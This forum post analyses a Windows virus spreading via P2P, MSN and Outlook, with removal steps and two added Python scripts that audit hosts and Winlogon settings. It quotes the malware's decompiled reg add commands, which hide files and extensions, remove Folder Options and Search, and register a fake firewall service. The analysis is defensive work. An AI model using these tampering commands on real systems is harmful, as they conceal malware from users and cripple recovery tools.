Yay! I feel so happy! I'm the one who found proof first that it was a virus! But what worries me is, GMod lua can have html pages. These html pages can run java. Java can give you viruses. GMod is not virus protected?
Edit: And oh yeah, Glenni is a giant dumbass (I know 5 ways he could have made the virus extremely painful to delete)
IT GETS INTO YOUR MSN MESSENGER TOO!
C:\WINDOWS\system32\dllcache\tmp.exe is also part of the virus
and C:\WINDOWS\system32\dllcache\temp.exe
It also uses LimeWire to spread "windows_7full.scr"
which is located in programfiles\Shared\
Virus: C:\WINDOWS\system32\drivers\temp123.exe
Virus: C:\WINDOWS\system32\temp.exe
Virus: recycler\S-1-5-21-8749679017-0950430147-468708784-3200\recycler.scr
Virus: C:\WINDOWS\system32\dllcache\recycled.exe
Virus: C:\WINDOWS\system32\dllcache\myporn.scr
Virus: C:\WINDOWS\system32\dllcache\doc.pif
Virus: C:\windows\system32\drivers\svchost.exe (it's not normally there)
Virus: C:\windows\system32\drivers\tmpp.exe
[tries to infect]
Virus: C:\windows\system32\drivers\tmpp.exe
Check your C:\windows\explorer.exe for (-Two-Binded-Files-From-Nathan72389s-Free-Example-Binder-)
Virus: C:\WINDOWS\system32\dllcache\stub.exe
Virus: C:\WINDOWS\system32\dllcache\recycled.exe
All of your autorun.inf files
[/tries to infect]
Virus: C:\windows\system32\winlogon.scr
Check your HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Security for an entry called Level1Add; if it contains ".exe,.pif,.exe", delete it.
Check your HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa for an entry called UAC with a value of "C:\WINDOWS\system32\dllcache\svchost.exe". Delete it (it's not on my system).
Check HKEY_CURRENT_USER\Software\Microsoft\OLE for an entry called UAC with a value of "C:\windows\system32\drivers\svchost.exe". Delete it (it's not on my system).
Check HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon entry "Shell". DO NOT DELETE THIS! If it contains anything other than explorer.exe, set the whole thing to "explorer.exe". DO NOT DELETE IT! THIS WOULD CAUSE YOUR SYSTEM TO MALFUNCTION.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon entry "UIHost". What it should be: "logonui.exe"
Virus: C:\windows\system32\net.vbs
Virus: C:\windows\system32\launch.vbs
Virus: C:\windows\system32\launch.bat
Check for C:\windows\system32\logg.txt. PM me the contents (remove any sensitive info like passwords, I'm not looking for that kind of shit) and then delete it.
Virus: C:\WINDOWS\system32\drivers\Interop.MessengerAPI.dl
Virus: C:\WINDOWS\system32\dllcache\Interop.MessengerAPI.dll
Virus: C:\WINDOWS\system32\pptemp.txt
Virus: C:\windows\system32\tmp.dll
Check your %windir%\system32\drivers\etc\hosts for any suspicious entries (like 127.0.0.1 antivir.de). Delete the entries but not the file.
Virus: %windir%\system32\13l.dll
Virus: %windir%\system32\pbrl.vbs
It also tries to send email to everyone with your Outlook, with a message body of "Hello , could you take a look to my picture i have taken some days ago?" and a subject of "HEY". Delete any messages you get and tell your friends to delete those messages too.
That's all the settings it changes
Code:
ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"HideFileExt\" /t \"REG_DWORD\" /d 1 /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"Hidden\" /t \"REG_DWORD\" /d 2 /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoFind\" /t \"REG_DWORD\" /d 1 /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoFolderOptions\" /t \"REG_DWORD\" /d 1 /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"SuperHidden\" /t \"REG_DWORD\" /d 0 /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"ShowSuperHidden\" /t \"REG_DWORD\" /d 0 /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
PM me the contents of %windir%\teemp.txt then delete it (remove sensitive info)
Virus: %%t\readme.scr
Remove sensitive info from %windir%\tmp.log, PM me the contents and delete it
Virus: C:\start.exe
Virus: %windir%\temp.dat
Virus: %%n\windows_7_full.exe
Virus: %windir%\temp.dtx
Virus: %%y\windows_7_full.exe
Virus: %windir%\tam.dl
It also adds user accounts
Virus: %windir%\teest.txt
Check your NetBIOS shared folders for funny.scr and LOOL.pif, delete them
Virus: %%g\%%v\STUPID.scr
Virus: %windir%\input123.blp
Check all of your P2P sharing programs
Virus: Microsoft\Messenger\porn_(anything can be here, it's random).sc
Virus: %windir%\system32\tomp.txt
My laziness is going to let you figure out what this code does
Code:
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ImagePath\" /t \"REG_EXPAND_SZ\" /d \"C:\\windows\\system32\\drivers\\svchost.exe\" /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"DisplayName\" /d \"Default Windows Firewall\" /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ObjectName\" /d \"LocalSystem\" /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"Start\" /t REG_DWORD /d \"2\" /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ErrorControl\" /t REG_DWORD /d \"0\" /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"Type\" /t REG_DWORD /d \"110\" /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKEY_CURRENT_USER\\Software\\Patchou\\Messenger Plus! Live\\GlobalSettings\\Scripts\\MSN PLUS\" /v background /d "
ldarg.0
If you use the AutoIt scripting language all of your include files are infected!
Virus: %windir%\system32\sys.bat
CHECK YOUR MIRC INI FILES
Virus: %windir%\ftp
Tries to stop McAfee firewall
Virus: C:\windows\system32\s4c.vbs
It tries to hijack Skype
Another attempt to hack Messenger
Code:
ldstr "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\MessengerService\\Policies"
ldstr "IMWarning"
ldstr "(M)Warning: The person who you are talking to is infected with a virus. Send him the removal tool that can be found in"
ldarg.0
ldstr "HKEY_CURRENT_USER\\Software\\Yahoo\\pager\\View\\YMSGR_buzz"
ldstr "content url"
Kill it
In your temp files you'll have win_update.exe, DELETE it
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon entry "UserInit": set it to "C:\WINDOWS\SYSTEM32\Userinit.exe"
And that's all I can get from server.exe
If you have any of the other virus files handy, upload them somewhere and PM me a link
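Added example, not from the post and not the malware author's code: the post asks the reader to eyeball the hosts file and the Winlogon Shell/UserInit/UIHost values by hand; this Python script does the same comparison automatically. The clean baseline values are the ones the post names (the trailing comma Windows leaves after userinit.exe is tolerated); the hosts text and the registry dict are constructed samples, so it runs offline on any OS. On a live Windows machine you would fill the dict from HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon with the standard winreg module.

```python
"""Added example (not from the post): offline audit of the hosts file and the
Winlogon values the post tells you to check by hand."""
import re

# Clean baseline for the Winlogon values the post says the malware rewrites.
WINLOGON_EXPECTED = {
    "Shell": "explorer.exe",
    "UserInit": r"C:\WINDOWS\system32\userinit.exe",
    "UIHost": "logonui.exe",
}

# Vendor-name fragments; a hosts entry pointing one of these at a loopback or
# blackhole address is the "127.0.0.1 antivir.de" pattern from the post.
AV_DOMAIN_FRAGMENTS = ("antivir", "avast", "avg", "bitdefender", "eset", "kaspersky",
                       "mcafee", "norton", "sophos", "symantec", "windowsupdate")
BLACKHOLE_IP = re.compile(r"^(127\.\d{1,3}\.\d{1,3}\.\d{1,3}|0\.0\.0\.0|::1)$")

# Constructed sample hosts file (not from the post).
HOSTS_SAMPLE = """# constructed sample
127.0.0.1 localhost
127.0.0.1 antivir.de
0.0.0.0 www.kaspersky.com liveupdate.symantec.com
192.168.1.10 fileserver
"""


def audit_hosts(hosts_text):
    """Return [(line_no, ip, hostname)] for security-vendor hosts that are
    redirected to loopback/0.0.0.0; comments and the localhost line are skipped."""
    findings = []
    for n, raw in enumerate(hosts_text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        if not BLACKHOLE_IP.match(ip):
            continue
        for name in names:
            lname = name.lower()
            if lname in ("localhost", "localhost.localdomain"):
                continue
            if any(frag in lname for frag in AV_DOMAIN_FRAGMENTS):
                findings.append((n, ip, name))
    return findings


def audit_winlogon(values):
    """Return {name: (found, expected)} for Winlogon values that differ from the
    baseline. The compare is case-insensitive and ignores a trailing comma (Windows
    itself leaves one after userinit.exe); a missing value is reported too."""
    bad = {}
    for name, expected in WINLOGON_EXPECTED.items():
        found = values.get(name)
        norm = (found or "").strip().rstrip(",").lower()
        if norm != expected.lower():
            bad[name] = (found, expected)
    return bad


if __name__ == "__main__":
    for hit in audit_hosts(HOSTS_SAMPLE):
        print("hosts line %d: %s -> %s" % hit)
    # Constructed Winlogon dump showing the Shell tampering the post describes.
    sample = {"Shell": r"explorer.exe,C:\windows\system32\winlogon.scr",
              "UserInit": r"C:\WINDOWS\system32\userinit.exe,",
              "UIHost": "logonui.exe"}
    for name, (found, expected) in audit_winlogon(sample).items():
        print("Winlogon %s = %r (expected %r)" % (name, found, expected))
```

The hosts check deliberately skips the normal `127.0.0.1 localhost` line and only flags vendor names sent to a non-routable address, which is what keeps the antivirus from updating; the Winlogon check reports a missing value as well as a changed one, because the post warns that deleting Shell breaks the system.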
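Added example, not from the post and not the malware author's code: the two "Code:" dumps above are IL that writes `reg add ...` lines into a script, and the post leaves the reader to work out what they do. This Python script, written for this post, pulls every `reg add` string out of such a dump, unescapes the C# literal, parses key, value name, type and data, and labels the settings the post discusses (file-extension hiding, hidden-file settings, Folder Options, Search, and the fake "Firewall" service's ImagePath). The IL sample is constructed in the same shape as the quoted dump, and the rule table is an assumption written for this post, not any real tool's signature set.

```python
"""Added example (not from the post): parse 'reg add' commands out of an IL dump
and label the Explorer/Policies/service settings they change."""
import re

# ldstr "<C#-escaped literal>"; the literal may contain \" and \\ sequences.
LDSTR = re.compile(r'ldstr "((?:[^"\\]|\\.)*)"')
# Tokenizer for the unescaped command line: "quoted" tokens or bare words.
TOKEN = re.compile(r'"([^"]*)"|(\S+)')
FLAG_TO_FIELD = {"/v": "value", "/t": "type", "/d": "data"}

# Constructed IL fragment (same shape as the post's dump; not copied verbatim).
IL_SAMPLE = r'''
ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\" /v \"HideFileExt\" /t \"REG_DWORD\" /d 1 /f"
callvirt void [mscorlib]System.IO.TextWriter::WriteLine(class System.String)
ldloc.s 0xA
ldstr "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoFolderOptions\" /t \"REG_DWORD\" /d 1 /f"
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"ImagePath\" /t \"REG_EXPAND_SZ\" /d \"C:\\windows\\system32\\drivers\\svchost.exe\" /f"
ldstr "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Firewall\" /v \"DisplayName\" /d \"Default Windows Firewall\" /f"
ldstr "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\MessengerService\\Policies"
'''

# Assumed rule table for this post: (key suffix, value name, data), all lowercase.
KNOWN_TAMPERING = {
    ("explorer\\advanced", "hidefileext", "1"): "hides file extensions, so .scr/.pif droppers look like documents",
    ("explorer\\advanced", "hidden", "2"): "stops Explorer showing hidden files",
    ("explorer\\advanced", "showsuperhidden", "0"): "hides protected operating-system files",
    ("explorer\\advanced", "superhidden", "0"): "hides protected operating-system files",
    ("policies\\explorer", "nofind", "1"): "disables Explorer's Search",
    ("policies\\explorer", "nofolderoptions", "1"): "removes Folder Options, so the settings above can't be undone from the GUI",
}


def unescape_cs(s):
    """Undo the C#-style escapes in an ldstr literal: backslash-quote,
    backslash-backslash, and the \\n / \\t pairs."""
    return re.sub(r'\\(.)', lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def parse_reg_add(cmd):
    """Parse 'reg add "KEY" /v NAME /t TYPE /d DATA /f' into a dict.
    Type defaults to REG_SZ, which is what reg.exe uses when /t is omitted."""
    toks = [bare or quoted for quoted, bare in TOKEN.findall(cmd)]
    rec = {"key": toks[2], "value": None, "type": "REG_SZ", "data": None, "force": False}
    i = 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag == "/f":
            rec["force"] = True
            i += 1
        elif flag in FLAG_TO_FIELD and i + 1 < len(toks):
            rec[FLAG_TO_FIELD[flag]] = toks[i + 1]
            i += 2
        else:
            i += 1
    return rec


def extract_reg_adds(il_text):
    """Return parsed records for every ldstr literal that is a 'reg add' command."""
    out = []
    for m in LDSTR.finditer(il_text):
        literal = unescape_cs(m.group(1))
        if literal.lower().startswith("reg add "):
            out.append(parse_reg_add(literal))
    return out


def classify(rec):
    """Short label for a record: a known Explorer/Policies tweak from the table,
    a service registration (ImagePath), or 'unclassified'."""
    key = rec["key"].lower()
    name = (rec["value"] or "").lower()
    for (suffix, vname, data), why in KNOWN_TAMPERING.items():
        if key.endswith(suffix) and name == vname and str(rec["data"]) == data:
            return why
    if "\\services\\" in key and name == "imagepath":
        return "registers a service binary: %s" % rec["data"]
    return "unclassified"


if __name__ == "__main__":
    for rec in extract_reg_adds(IL_SAMPLE):
        print("%s\\%s = %s (%s): %s" % (rec["key"], rec["value"], rec["data"], rec["type"], classify(rec)))
```

Everything the malware writes under Explorer\Advanced and Policies\Explorer is a per-user (HKCU) value, so undoing it needs no admin rights; the Services\Firewall entries are HKLM and are how the dropped drivers\svchost.exe gets started at boot, which is why the post tells you to look for that file.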